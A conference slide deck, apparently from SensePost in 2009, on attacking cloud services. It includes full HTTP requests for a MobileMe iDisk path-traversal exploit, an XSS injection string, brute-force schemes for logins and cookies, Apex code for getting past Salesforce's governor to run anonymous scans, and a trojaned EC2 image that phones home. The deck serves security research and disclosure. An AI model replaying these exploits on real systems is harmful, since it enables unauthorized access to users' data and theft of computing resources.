This is not the time to split hairs

The LOUD in cLOUD security..

A bunch of people are talking about "the cloud"

There are large numbers of people who are immediately down on it:

"There is nothing new here"

"Same old, Same old"

If we stand around splitting hairs, we risk missing something important..
So, what

Cloud delivery models

[Figure: Cloud Taxonomy & Ontology - Draft v1.4 - Hoff]
Why would we want to break it?

It will be where the action is..

Insidious the dark side is..

Amazingly we are making some of the same old mistakes all over again

We really don't have to..
What is driving Cloud adoption?

Management by in-flight magazine

- Manager Version

- Geek Version

Poor history from IT

Economy is down

- Cost saving becomes more attractive

- Cloud computing allows you to move from CAPEX to OPEX

- (Private Clouds?)
A really attractive option

EC2 is Cool! Like Crack..
Problems testing the Cloud

Transparency

[Screenshot: excerpt from an article asking why Amazon has been less transparent about how the Kindle works; the body text is not legible in the capture]

[Screenshot: cloudsecurity.org interview with GvR about App Engine]

cloudsecurity.org: Trust is often cited as a barrier to enterprise adoption of Cloud Computing. What role do you [remainder of the question illegible]

cloudsecurity.org: How do you contain an attacker that exploits bugs in App Engine from exploiting the underlying OS and potentially interfering with other users' processes or attacking backend systems?

GvR: You are correct that there are strong measures in place, but I'm not at liberty to discuss details.
Compliance in the Cloud

"If it's non-regulated data, go ahead and explore. If it is regulated, hold on. I have not run across anyone comfortable putting sensitive/regulated data in the cloud"

"doesn't seem to be there as far as comfort level that security and audit aspects of that will stand up to scrutiny" (sic)

-- Tim Mather: RSA Security Strategist
Privacy

Jim Dempsey (Center for Democracy and Technology): "Loss of 4th Amendment protection for US companies"

A legal order (court) to serve data can be used to obtain your data without any notification being served to you

There is no legal obligation to even inform you it has been given
Simple solution

Crypto Pixie Dust!

[image]

Would you trust crypto on an owned box?
Vendor Lock-in

Pretty self-explanatory

If your relationship dies, how do you get access to your data?

Is it even your data?
Availability [Big guys fail too?]

[Screenshot: maintenance notice]

"We're performing routine maintenance & updating our site and will be back online shortly. This maintenance window will last from 6PM PDT to 9PM PDT. During this time, all your data is 100% secure. Sorry for any inconvenience."
NomaDesk versus Omnidrive

[Screenshot: nomadesk.com front page]

Omnidrive is no longer available, we recommend NomaDesk

Welcome to NomaDesk. We develop a document collaboration software for geographically dispersed professionals who need secure access to shared files daily. NomaDesk was founded in 2004 by Filip Tack, its current CEO, along with CTO Miguel De Buf and COO Peter Geldhof. Based in Gent, Belgium, the company is supported by Gimv, a European independent investment company. NomaDesk has offices and datacenters in the US and Europe.

We are not affiliated with Omnidrive. We feel compelled to maintain the domain name because we are convinced of the business value of a Software-as-a-Service to share, synchronize and backup business critical data, so do thousands of SMB customers that use NomaDesk on a daily basis. NomaDesk has and will be running its service for years to come. You are kindly invited to:

- Check out our product offering
- Download your 30 day free trial
- Contact customer support or a sales representative
Availability [not just uptime!]

Account Lockout?

"Malicious activity from your account"
Monoculture

MonocultureGate is well known in our circles.

Just viewing that pic resulted in a raised average IQ in this room.

His (their) thesis:

"A monoculture of networked computers is a convenient and susceptible reservoir of platforms from which to launch attacks; these attacks can and do cascade."

Most people agreed with Dr Geer (et al) back then..

Just because it's not Windows, doesn't mean the thesis disappears.
SmugMug Case Study

Process 50+ terapixels per day

Poster child of AWS

Heavy use of S3 and EC2

Launched 1920 standard instances in one call

You don't get monoculture'er than ~2000 machines that are all copies of the same image..

ASLR Fail.. ?
While we're talking about phishing

Trust
Cloud #fail

Media Max Online Storage - inactive account purging script error whacked active customer accounts

Nokia Ovi (like MobileMe) lost 3 weeks of customer data after crash

Jan 2009 - SF.com customers couldn't log in - "core network device failed with memory allocation errors"

[SensePost-2009]

But you have to trust someone!

<+ben> kostyas cloudbreak stuff really scares me

<+MH> it's impressive for sure, but why would that scare you more than simple Amazon evilness? (Malfeasance)

<+ben> You have to trust someone.. Just like how you trust Microsoft not to backdoor your OS, you trust Amazon not to screw you
Red Herring Alert!

Complete the popular phrase.

Trust, but ____!

Reverse Engineers keep Microsoft honest

(or at least raise the cost of possibly effective malfeasance)

Even "pre-owned" hardware is relatively easy to spot (for some definition of easy)

But how do we know that Amazon (or other big names) "Won't be evil"™
[Screenshot: article "Crypto AG: The NSA's Trojan Whore?" by Wayne Madsen]

"FOR AT LEAST HALF A CENTURY, THE US HAS BEEN INTERCEPTING AND DECRYPTING THE TOP SECRET DOCUMENTS OF MOST OF THE WORLD'S GOVERNMENTS"
Using the Cloud

For hax0r fun and profit:

- Dino Dai Zovi vs. Debian

- Ben Nagy vs. MS Office

- Dmolnar && Zynamics
DDZ vs Debian

1. Populate a distributed queue with strings describing which keys to generate

2. Launch 20 VMs (the default limit)

3. Fetch key descriptors from queue, generate batches of keys, and store in S3

524,288 RSA keys - 6 Hours - $16
Metafuzz "Harness"

[Diagram: Production 1 .. Production n -> Fuzz Server -> Delivery 1 .. Delivery n; /fuzzfiles; crash-n.doc; marked "Private & Confidential, Property of COSEINC"]

Zynamics && DMolnar

Zynamics use EC2 to demo software and classify malware, up to ~50k samples/day

David Molnar and friends fuzz-test Linux binaries, sift results and notify devs, all on
Some of the players

[Logos, including icloud]

Autoscaling / Usage costing

Autoscaling is a great idea for companies.

Wall Street & Amazon EC2

Can you spot..

[Screenshot: Google AdSense]
Storage as a Service

In most cases this is a really simple model

Faster Internet tubes is making backing up over tubes reasonable

Disk access anywhere is a nice idea

All throw crypto-pixieDust-magic words in their marketing documents

For good measure all throw in Web based GUI access

Web Apps

File Systems
Amazon EC2

Secure Wiping

[Screenshot: "steekR Shared Space Notification" mail in Gmail; the shared folder's name is the injection string "><iframe src=http://xssed.com>, shown alongside the xssed.com XSS Archive]

MobileMe: yourDisk is myDisk

by jrichards on Jul. 03. 2009, under Uncategorized
[Screenshot: Burp repeater request/response tabs, POST to Host: idisk.mac.com]

[Screenshot: Finder view of the jeremyrichards home folder on iDisk: Backup, Documents, Library, Movies, Music, pass, Pictures, PRIVATE.txt (1 KB, plain text), Public, Sites, Software, untitled folder; 12 items, 10 GB available]

PRIVATE.txt: "This is a private file that lives outside the "Public folder". It should not be accessible from a Public folder."
[Burp: raw request. A PROPFIND is tunnelled over POST with the webdav-method query parameter, and the path carries a percent-encoded ../ that steps out of the Public folder]

POST /jeremy.richards-Public/%2E%2E%2F/?webdav-method=PROPFIND HTTP/1.1
Host: idisk.mac.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Depth: 1
Content-Type: text/xml; charset=UTF-8
Referer: http://idisk.mac.com/jeremy.richards-Public?view=web
Pragma: no-cache
Cache-Control: no-cache
Content-Length: [illegible in the screenshot]

<?xml version="1.0" encoding="utf-8"?>
<D:propfind xmlns:D="DAV:">
<D:prop>
<D:getlastmodified/>
<D:getcontentlength/>
<D:resourcetype/>
<D:getcontenttype/>
</D:prop>
</D:propfind>
[Burp: raw response. The server answers the PROPFIND for the parent of the Public folder and lists the whole home directory, PRIVATE.txt included]

HTTP/1.1 207 Multi-Status
Server: AppleIDiskServer-1E2012
x-responding-server: idiskng075
X-dmUser: jeremy.richards
Content-Type: text/xml;charset=...
Date: Wed, 01 Jul 2009 15:41:03 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<multistatus xmlns="DAV:">
<D:response xmlns:D="DAV:">
<D:href>/jeremy.richards-Public/../</D:href>
<D:getlastmodified>Wed, 01 Jul ... (cut off in the screenshot)</D:getlastmodified>
<D:status>HTTP/1.1 200 OK</D:status>
...

[The href of each further D:response in the listing; the rest of each response is cut off in the screenshot]

<D:href>/jeremy.richards-Public/../.Groups/</D:href>
<D:href>/jeremy.richards-Public/../Backup/</D:href>
<D:href>/jeremy.richards-Public/../Documents/</D:href>
<D:href>/jeremy.richards-Public/../Library/</D:href>
<D:href>/jeremy.richards-Public/../Movies/</D:href>
<D:href>/jeremy.richards-Public/../Music/</D:href>
<D:href>/jeremy.richards-Public/../Pictures/</D:href>
<D:href>/jeremy.richards-Public/../Public/</D:href>
<D:href>/jeremy.richards-Public/../Sites/</D:href>
<D:href>/jeremy.richards-Public/../untitled%20folder/</D:href>
<D:href>/jeremy.richards-Public/../.DS_Store</D:href>
<D:href>/jeremy.richards-Public/../PRIVATE.txt</D:href>
<D:href>/jeremy.richards-Public/../.Temporary Items/</D:href>
<D:href>/jeremy.richards-Public/../pass/</D:href>
[Burp suite v1.1 professional, repeater tab, host idisk.mac.com: raw request fetching the private file through the same encoded ../]

GET /jeremy.richards-Public/%2E%2E%2FPRIVATE.txt?disposition=download+B300 HTTP/1.1
Host: idisk.mac.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://idisk.mac.com/jeremy.richards-Public?view=web

[done, length: 457]
[Burp: raw response. The file outside the Public folder is served]

HTTP/1.1 200 OK
Server: AppleIDiskServer-1E2012
x-responding-server: idiskng0?? (illegible)
X-dmUser: jeremy.richards
ETag: "u-lg3sl8hn-3e0p-1372yjpvf7-2b6d9rze2c0"
Last-Modified: Wed, 01 Jul 2009 15:37:03 GMT
Content-disposition: attachment;
Content-Type: text/plain
Content-Length: 114
Date: Wed, 01 Jul 2009 15:46:34 GMT
Connection: close

This is a private file that lives outside the "Public folder". It should not be accessible from a Public folder.
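The defect above is a percent-encoded `..` that is normalised (or not normalised at all) before it is decoded, plus a method override smuggled in the query string. The check below is an added example, not code from the talk or from MobileMe: it decodes first, normalises second, and refuses anything that leaves the share root. The parameter name `webdav-method` and the share root are taken from the captured requests; the function names and the sample request list are assumptions constructed for the demo.

```python
"""Defender-side check: does a WebDAV request target stay inside its share root?"""
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

# Query parameter seen in the captured request; any override counts as the real method.
METHOD_OVERRIDE_PARAM = "webdav-method"


def percent_decode_fully(text: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly so a double-encoded %252E%252E is caught as '..' too."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def effective_method(http_method: str, query: str) -> str:
    """Return the WebDAV method actually requested, honouring the override parameter."""
    override = parse_qs(query).get(METHOD_OVERRIDE_PARAM)
    return (override[0] if override else http_method).upper()


def resolve_under_root(share_root: str, raw_path: str):
    """Return the normalised path if it stays inside share_root, otherwise None.

    Decoding happens before normalisation: normalising '%2E%2E%2F' while it is
    still encoded leaves the traversal intact, which is the failure mode shown above.
    """
    decoded = percent_decode_fully(raw_path)
    if "\x00" in decoded or "\\" in decoded:  # NUL bytes and backslashes are never legitimate here
        return None
    normalised = posixpath.normpath("/" + decoded.lstrip("/"))
    root = posixpath.normpath("/" + share_root.strip("/"))
    if normalised == root or normalised.startswith(root + "/"):
        return normalised
    return None


def check_request(http_method: str, target: str, share_root: str) -> dict:
    """Classify one request-line target: effective method, resolved path, verdict."""
    parts = urlsplit(target)
    method = effective_method(http_method, parts.query)
    resolved = resolve_under_root(share_root, parts.path)
    return {"method": method, "path": resolved, "allowed": resolved is not None}


# Constructed sample: the two captured targets from the page plus benign and double-encoded ones.
SAMPLE_REQUESTS = [
    ("POST", "/jeremy.richards-Public/%2E%2E%2F/?webdav-method=PROPFIND"),
    ("GET", "/jeremy.richards-Public/%2E%2E%2FPRIVATE.txt?disposition=download"),
    ("GET", "/jeremy.richards-Public/Documents/"),
    ("GET", "/jeremy.richards-Public/sub/../photo.jpg"),
    ("GET", "/jeremy.richards-Public/%252E%252E%2FPRIVATE.txt"),
]


def audit(requests=SAMPLE_REQUESTS, share_root="/jeremy.richards-Public"):
    """Run the check over a list of (method, target) pairs."""
    return [check_request(m, t, share_root) for m, t in requests]


if __name__ == "__main__":
    for (method, target), verdict in zip(SAMPLE_REQUESTS, audit()):
        print(f"{method:4} {target:58} -> {verdict}")
```

A `..` that stays inside the share (the `sub/../photo.jpg` case) is still accepted, so the rule rejects escapes rather than the two characters themselves.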
[Diagram sequence: guessing a login at http://bank.com/login]

username=bob&password=cat -> "Sorry! Please check your password and try again"

username=bob&password=dog -> "Sorry! Please check your password and try again"

username=bob&password=fish -> "Welcome Bob!"

username=bob&password=thiscannevereverberight -> "Sorry! Please check your password and try again" (Page-Sig: 0123384)

username=bob&password=fish -> "Sorry! Please check your password and try again" (Page-Sig: 0123384, Page-diff: 0.23213)

[Diagram: username=bob&password=thiscannevereverberight and username=bob&password=dog both reported as "Failed Login"]

[Diagram: one password tried across many accounts against http://bank.com/login: username=bob, tom, sam, rick, carp with password=fish]

username=bob&password=fish -> "Welcome Bob!" with SessionID: ADSFERDFGDGDSDDFDSFSDFDSF

GET /balance
Cookie: ADSFERDFGDGDSDDFDSFSDFDSF

-> Balance = $123342342423

[Diagram: guessing session cookies against http://bank.com/login]

GET /balance
Cookie: AAAAAAAAAAAAAAAAAAAAAAA

GET /balance
Cookie: AAAAAAAAAAAAAAAAAAAAAA

GET /balance
Cookie: AAAAAAAAAAAAAAAAAAAAAA

GET /balance
Cookie: ZZZZZZZZZZZZZZZZ

-> Balance = $123342342423
[Video: file:///Users/haroon/Desktop/Vegas Video/sugarsync/sugarsync-proj/sugarsync-proj.html]

Overview of sugarsync + normal password reset

Ends with sample link..
It's Short, Brute & Declare Victory

?secret=for472gtb422

= lower case alphanumeric
= 35^12

= Still a too big number :)

Birthday Attack?

= 1.2*sqrt(35^12)

= Still a pretty big number
We Have 2 Days..

single thread : 1 hour : 648

single thread : 2 days : 31104

10 threads : 2 days : 221472

10 machines : 2 days : 2 214 720

Won't they notice?
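Carrying the two slides' own numbers through, as an added worked calculation (not from the original talk), with the 35-symbol count and the two-day totals exactly as the slides give them:

$$N = 35^{12} \approx 3.4 \times 10^{18}$$

$$R_{2\text{d}}^{(1)} = 648 \cdot 48 = 31\,104 \ \text{(one thread)}, \qquad R_{2\text{d}}^{(10 \times 10)} = 2\,214\,720 \ \text{(ten machines, ten threads each)}$$

$$\frac{R_{2\text{d}}^{(10 \times 10)}}{N} \approx \frac{2.2 \times 10^{6}}{3.4 \times 10^{18}} \approx 6.5 \times 10^{-13}$$

$$T_{\text{expected}} \approx \frac{N}{2} \cdot \frac{2 \text{ days}}{2.2 \times 10^{6}} \approx 1.5 \times 10^{12} \text{ days}$$

$$1.2\sqrt{N} = 1.2 \cdot 35^{6} \approx 2.2 \times 10^{9} \approx 10^{3} \cdot R_{2\text{d}}^{(10 \times 10)}$$

So ten machines cover under one part in $10^{12}$ of the space in the two days available, and even the birthday-sized amount of work is about a thousand times the budget, which is why the next slide declares the pride saved.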
Saved (some pride)

[sugarsync vids]
PaaS

Actually..

SF.com is both SaaS and PaaS

We took a quick look at SaaS

Good filtering, and held up well to cursory testing

Why cursory?

Ultimately, it *is* a web application..
Clickjack

[clickjack vid]
SalesForce back story

[Logo: salesforce.com - Success. Not Software.]

10 years old

Initially web-based CRM software

- 59 000 customers
- $1 billion in revenue

Distributed infrastructure was created to support CRM (SaaS, weeeee!)

Platform was exposed to architects and devs, for PaaS and IaaS

- (Ambitious project with solid aims)
Salesforce business model

Multi-tenant

- Customers share infrastructure

- Spread out across the world

Subscription model

- Scales with features and per-license cost

Free dev accounts

- More limited than paid-for orgs

AppExchange

- Third party apps (a la App Store)
[Screenshot: a Visualforce page and Apex class in the Force.com editor]

<apex:page>
<html>
<head>
<title>VisualForce Iterator</title>
</head>
<body>
<h1>Page Content Follows (we don't expect to get here, btw)</h1>
{!pageData}
</body>
</html>
</apex:page>

public void nextLoop(Integer counter) {
    // the single 'looper' record carries the iteration count between runs
    EmailIteratorObj__c o = [select id, counter__c from EmailIteratorObj__c where name='looper'][0];
    o.counter__c = counter;
    update o;
}

//called to initiate loop termination
public void endLoop() {
    insert new Message__c(MsgType__c=Messages.ENDLOOP);
}

//called right at the end of a set of loop iterations
public void cleanup() {
    //clean out the email iterator objects
    for (List<EmailIteratorObj__c> o : [select id from EmailIteratorObj__c]) {
        delete o;
    }

    //clean out messages
    for (List<Message__c> o : [select id from Message__c]) {
        delete o;
    }
}

Other language features

Make HTTP requests

Bind classes to WS endpoints

Can send mails

Bind classes to mail endpoints

Configure triggers on datastore activities
Multi-tenancy...

an obvious problem for resource sharing
The Governor

Each script execution is subject to strict limits

Uncatchable exception issued when limits exceeded

Limits based on entry point of code

Limits applied to namespaces

- Org gets limits

- Certified apps get limits

Published Limits

2. Running time

3. ???
Apex limitations

Language focused on short bursts of execution

Can't easily alter SF configuration

- Requires web interface interactions

APIs short on parallel programming primitives

- no explicit locks and very broad synchronisation

- no real threads

- no ability to pause execution

- no explicit shared mem

API call order important
Workarounds

// busy-wait "sleep": Apex has no way to pause, so burn CPU until the clock moves on
public static void sleep(Integer secs) {
    System.debug('Entered sleep(' + secs + ')');
    Datetime t1 = System.now();
    Datetime t2 = System.now();
    Double j, k = 2;
    while (t2.getTime() - t1.getTime() < secs*1000) {
        // the original is a much longer chain of nested Math.cbrt() calls (partly illegible in the screenshot)
        j = Math.cbrt(Math.cbrt(Math.cbrt(Math.cbrt(k))));
        t2 = System.now();
    }
    System.debug('Leaving sleep()');
}

// fragment: tail of a lock-acquisition method built on a counter record (lck) and the sleep above
if (!secondarythread) {
    //hack to detect when lock counter was changed while we waited for writelock
    if (prior.locknum__c == lck.locknum__c) {
        //all looks good, let's first sleep to enforce a single thread of execution at the end of this time window
        Utils.sleep(window);
        lck.locknum__c += 1;
        update lck;
        luckiness = true;
    }
}
return luckiness;
}

Threads?
Bypassing the governor

[Diagram: a global class exposed as a web service (global class WS...ator, name partly illegible); Apex invoked; "Do stuff"; insert object with pre-defined trigger; trigger fires an email back to ourselves; WS loop / fail; remaining labels illegible]
And so?

Sifto!

Ported Nikto into the cloud as a simple e.g.

Process

- Class adds allowed endpoint through HTTP calls to SF web interface

- Event loop kicked off against target

  • Each iteration performs ten tests

  • State simply inserted into datastore at end of ten tests

  • Trigger object inserted to fire off email for next iteration

  • Results returned via email as they are found

Why?

- Free!

- Fast (for .za)

- Anonymity
[sifto vid]

Pros / cons

Pros

- Fast(er) with more bandwidth

- Free!

- Capacity for DoS outweighs home user

- How about SF DoS?

Cons

- Prone to monitoring

- Custom language / platform

- Technique governed by email limits
[Screenshot: the Developer Force sign-up page (free Developer Edition environment) with its "For Your Security" CAPTCHA, and the raw CAPTCHA image response as fetched with curl: the JPEG data is interleaved with a dumped "PhpCaptcha Object" whose fields include [cFonts] => Array (fonts/VeraBd.ttf, fonts/VeraIt.ttf, fonts/Vera.ttf), [iWidth] => 204, [iNumChars] => 5, [iNumLines], [aCharSet], [bCaseInsensitive] => 1, [sBackgroundImages], [iMinFontSize] => 16, [iMaxFontSize] => 25, [bUseColour] => 1, [sFileType] => jpeg and [sCode] => (value illegible)]

Developer Force sign-up

Free Developer Edition environment
Future Directions

Sifto is a *really* basic POC hinting at possibilities

- Turing complete, open field. Limited API though

Platform is developing rapidly, future changes in this area will introduce new possibilities

- Callouts in triggers for event loops

- Reduction in limitations

- Improvements in language and APIs

Abstracted functionality on *aaS makes usage easier, but impact remains

Security is transferred into hands of non-security aware C-levels, ouch.

Rootkits

Security community interaction
[Logo: amazon web services]

Yes... it's that cool...
The Pieces (that we will touch)..

- EC2

- S3

- SQS

- DevPay

What we ignore:

- SimpleDB

- Elastic IP

- CloudFront

- Elastic MapReduce

- Mechanical Turk
Root access to a Linux machine in seconds

Scalable costs..
S3

[Screenshot: an S3 client (Manage Accounts / Synchronize Folders / AWS Import/Export / Transfer Log) browsing a SensePost bucket: folders spscan, spscan2, spscan3, spscan4, splogs, spl, qscan, fedora_11_full, copy-1, copy-2, amazon_fedora_8, with modified and upload times between May and July 2009]
[Chart: S3 growth - 800 Million (August 06), 5 Billion (April 07), 10 Billion (October 07), 14 Billion (January 08)]
Amazon S3

[Diagram: buckets and keys - bucket mculver-images holds Beach.jpg and 2005/party/hat.jpg; bucket media.mydomain.com holds img1.jpg and img2.jpg; bucket public.blueorigin.com holds index.html and img/pic1.jpg]
SQS

[Diagram: Producer, Producer -> queue -> Consumer]

When in doubt - Copy Marco!

Can we steal computing resources from Amazon (or Amazon users?)

Sure we can..
Breakdown

Amazon provide 47 machine images that they built themselves..

[Screenshot: AWS Management Console, Amazon Machine Images, Region US-East, viewing "All Images / All Platforms", 1 to 50 of 2768 AMIs; rows such as level22-ec2-images/ubuntu-7.04-feisty-base (Public, Ubuntu), alestic-64/ubuntu-8.04-hardy-base-64-20081222.manifest.xml (Public, Ubuntu) and rbuilder-online/... (Public, Other Linux)]
Shared AMI gifts FTW!

Bundled AMIs + Forum Posts

Vulnerable servers? Set_slice? SSHD?

Scanning gets you booted.. We needed an alternative..
GhettoScan

[Diagram, numbered steps: (1) generate list of all available AMIs; (2) populate SQS with the list of AMIs; ... steps (6) and (7) return results to the attacker; remaining labels illegible]
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Results 



[Terminal screenshots: per-AMI file listings from the bundled images, showing leftover cert-*.pem and pk-*.pem credential files, SSH key pairs and the ec2-bundle-vol command lines (with the owner's key, certificate and account id) still on disk; plus Nessus result counts: `grep High *.nsr | wc -l` giving 1293 and `grep Critical *.nsr | wc -l` giving 646]





License Stealing 
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[Screenshot: Microsoft Windows Update in Internet Explorer on a Windows Server 2003 instance, downloading and installing 50 updates]
Why stop there? 

[Diagram: Your Customer -> $ -> Amazon DevPay -> $ -> AWS]
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Amazon DevPay 

[neek steal vid] 
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AWS as a single point of failure 



Availability is a huge selling point 

Some DoS attacks can't be stopped.. It's 
simply using the service.. 

But it does need to be considered.. 
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But it is Amazon!! 



• Distributed Denial Of Service (DDoS) Attacks: AWS API endpoints are hosted 
on the same Internet-scale, world class infrastructure that supports the 
Amazon.com retail site. Standard DDoS mitigation techniques such as syn 
cookies and connection limiting are used. To further mitigate the effect of 
potential DDoS attacks, Amazon maintains internal bandwidth which exceeds its 
provider-supplied Internet bandwidth. 
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DDoS ? Really? 
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and 

• file:///Users/haroon/Desktop/Vegas Video/ec2-multilogin/ec2-create-20-release/ec2-create-20-proj/ec2-create-20-proj.html 
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Twill Loving! 



[ec2 account creation vid] 

Scaling Registration? 

[Animated timeline: 3 minutes, 6 minutes, 9 minutes ...] 

[Graph: "Booting EC2 Instances Exponentially", log-scale y-axis from 100 to 1e+12, ending at 794,280,046,581] 
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Another way to steal machine time 




If you plan to use a shared AMI, review the following table to confirm the AMI is not doing anything malicious. 

Launch Confirmation Process 

1 Check the ssh authorized keys file. The only key in the file should be the key you used to launch the AMI. 

2 Check open ports and running services. 

3 Change the root password if it is not randomized on startup. For more information on randomizing the root password on startup, see Disable Password-Based Logins for Root. 

4 Check if ssh allows root password logins. See Disable Password-Based Logins for Root for more information on disabling root based password logins. 

5 Check whether there are any other user accounts that might allow backdoor entry to your instance. Accounts with super user privileges are particularly dangerous. 

6 Verify that all cron jobs are legitimate. 
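A defender-side script that walks the six checks above on a freshly booted shared AMI, as an added example (not the deck's code and not an AWS tool). It assumes a POSIX shell with awk, grep and sed; every check takes its input file as an argument so it can be run against copied files, and the ss/netstat call and the old OpenSSH default of "yes" for an absent PermitRootLogin are assumptions about the image.

```shell
#!/bin/sh
# Added example (not from the SensePost deck, not an AWS tool): walk the launch
# confirmation list on a freshly booted shared AMI. Each check reads the file
# given as an argument (live system paths are used only by audit_instance).

# (1) Count authorized_keys entries that are NOT your own launch key.
#     $1 = authorized_keys file, $2 = a unique substring of your public key.
foreign_keys() {
    grep -v '^#' "$1" | grep -v '^[[:space:]]*$' | grep -vcF -- "$2" || true
}

# (2) Listening TCP sockets (assumed tooling: ss or netstat; adjust to the image).
listening_ports() {
    (ss -ltn 2>/dev/null || netstat -tln 2>/dev/null) | awk '$4 ~ /:[0-9]+$/ { print $4 }'
}

# (3) State of root's password hash in the shadow file ($1):
#     locked ("!" or "*"), empty (no password at all), or set (a real hash).
root_password_state() {
    awk -F: '$1 == "root" { if ($2 == "") print "empty";
             else if ($2 ~ /^[!*]/) print "locked"; else print "set"; exit }' "$1"
}

# (4) Effective PermitRootLogin from sshd_config ($1). sshd honours the FIRST
#     occurrence of a keyword; OpenSSH of the day defaulted to "yes" when it
#     was absent (newer releases default to prohibit-password).
permit_root_login() {
    v=$(awk 'tolower($1) == "permitrootlogin" { print tolower($2); exit }' "$1")
    printf '%s\n' "${v:-yes}"
}

# (5) Every UID 0 account other than root in the passwd file ($1).
extra_root_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# (6) Non-comment lines of each crontab named as an argument, prefixed with
#     the file they came from, so each job can be checked for legitimacy.
cron_entries() {
    for f in "$@"; do
        [ -f "$f" ] || continue
        grep -v '^[[:space:]]*#' "$f" | grep -v '^[[:space:]]*$' | sed "s|^|$f: |"
    done
}

# Run the whole list against the live system; $1 = substring of your own key.
audit_instance() {
    echo "foreign keys in authorized_keys: $(foreign_keys /root/.ssh/authorized_keys "$1")"
    echo "listening ports:"; listening_ports
    echo "root password: $(root_password_state /etc/shadow); PermitRootLogin: $(permit_root_login /etc/ssh/sshd_config)"
    echo "extra UID 0 accounts: $(extra_root_accounts /etc/passwd)"
    echo "cron entries:"; cron_entries /etc/crontab /etc/cron.d/* /var/spool/cron/*
}
```

Run `audit_instance <substring-of-your-key>` as root on the new instance; anything other than 0 foreign keys, "locked" root password, PermitRootLogin "no" and an empty UID 0 list needs explaining before the image is trusted.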







Really ? 
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Can we get people to run our image? 



Bundle an image 

Register the image (Amazon assigns it an 
AMI-ID) 

Wait for someone to run it 

Profit! 

Alas.. 
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Can we get people to run our image? 



[Terminal screenshot: ec2-bundle-vol output, "Created image.part.113" through "Created image.part.149", then "Generating digests for each part.", "Digests generated.", "Creating bundle manifest...", "ec2-bundle-vol complete."] 



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Register image, too high, race, top5 

file:///Users/haroon/Desktop/Vegas_Video/aws-race/aws-race-release/aws-race-proj.html 
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AMI creation 



[registration racing vid] 
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S3 + Image names are going to set off 
another name grab! 

Register image as Fedora ? 



[root@ec2box]# ec2-upload-bundle -b Fedora -m /tmp/image.manifest.xml -a secret -s secret 

ERROR: Error talking to S3: Server.AccessDenied(403): Only the bucket owner can access this property 
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[root@ec2box]# ec2-upload-bundle -b fedora_core -m /tmp/image.manifest.xml -a secret -s secret 

ERROR: Error talking to S3: Server.AccessDenied(403): Only the bucket owner can access this property 
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[root@ec2box]# ec2-upload-bundle -b redhat -m /tmp/image.manifest.xml -a secret -s secret 

ERROR: Error talking to S3: Server.AccessDenied(403): Only the bucket owner can access this property 
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[root@ec2box]# ec2-upload-bundle -b fedora_core_11 -m /tmp/image.manifest.xml -a secret -s secret 

Creating Bucket... 
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[Screenshot: AWS Management Console, Amazon Machine Images view (1 to 50 of 2767 AMIs), in which a public image registered as fedora11full/image.manifest.xml is listed with platform "Fedora" next to the other public images] 

[Terminal screenshot: tail -f of the web server's SSL log, showing requests from a remote client for EC2_IMAGE_BOOTED and, later, EC2_IMAGE_KILLED as someone runs and then terminates the image] 
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New Mistake, Old Mistake 



[Screenshot: Amazon Web Services Security forum, thread "Blocking outbound connections"] 

Original post: Is there a way to block outgoing conn[ections ...] that all outbound ports be blocked except those specifically [...]. I've looked over the (scanty) EC2 docu[mentation ...] security groups seem to be concerned only with incoming traffic. 

Reply: Why are you trying to block outbound [...] to do this. The only reason I could think of off the top of m[y head ...]. Also, I am sorry I don't quite know the answer. 

[Overlaid excerpt from the AWS security whitepaper:] 

... administer EC2 hosts, their privileges on and access to the bastion hosts are 
revoked. 

Guest Operating System: Virtual instances are completely controlled by the 
customer. They have full root access and all administrative control over 
additional accounts, services, and applications. AWS administrators do not have 
access to customer instances, and cannot log into the guest OS. Customers should 
disable password-based access to their hosts and utilize token or key-based 
authentication to gain access to unprivileged accounts. Further, customers should 
employ a privilege escalation mechanism with logging on a per-user basis. For 
example, if the guest OS is Linux, utilize SSH with keys to access the virtual 
instance, enable shell command-line logging, and use the 'sudo' utility for 
privilege escalation. Customers should generate their own key pairs in order to 
guarantee that they are unique, and not shared with other customers or with AWS. 
Firewall: Amazon EC2 provides a complete firewall solution; this mandatory 
inbound firewall is configured in a default deny mode and the Amazon EC2 
customer must explicitly open any ports to allow inbound traffic. The traffic may 
be restricted by protocol, by service port, as well as by source IP address 
(individual IP or CIDR block). 
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Mobile me 



Apple sneaks into the cloud 

Makes sense long term, your music, video, 
* are belong to Steve Jobs 

Insidious 

iDisk, iMail, iCal, findmyPhone 
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Hacked by. 



[Screenshots: MobileMe iDisk public folders at http://idisk.mac.com/<username>-Public?view=web; one account shows "Account Error: Inactive", another shows a user's Public Folder listing (Name, Date Modified, Size) with New Folder and Upload controls] 
Account password reset 



A hard problem to solve in the cloud.. 
Forgot password -> Nick 
All dressed up and nowhere to go? 
Is everyone as "easy" as Nick? 






and so? 



Told ya it was insidious.. 

We have been going lower and lower with 
trojans now living in firmware 

Will we notice the trojans so high up in the 
stack that follow us everywhere? 

We all looked down on XSS initially 
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Conclusions 



There are new problems to be solved (and some new solutions to 
old problems) with computing power on tap. 

Marrying infrastructure to web applications means that your 
enterprise now faces risks from both infrastructure dodginess and 
bad web application code. 

Even if marrying *aaS to web applications makes sense, tying them 
to Web2.0 seems like a bad idea. 

Auditors need to start considering the new risks the new paradigm 
brings: 

• (negative) One more set of problems scanners can't find 

• (positive) job security++ 

Computationally difficult is easily within reach of anyone with a 
Credit Card. 

We are getting moved into the cloud even if we don't know it. 
(Making us vulnerable to the "lame attacks" even if we don't rate 
them) 

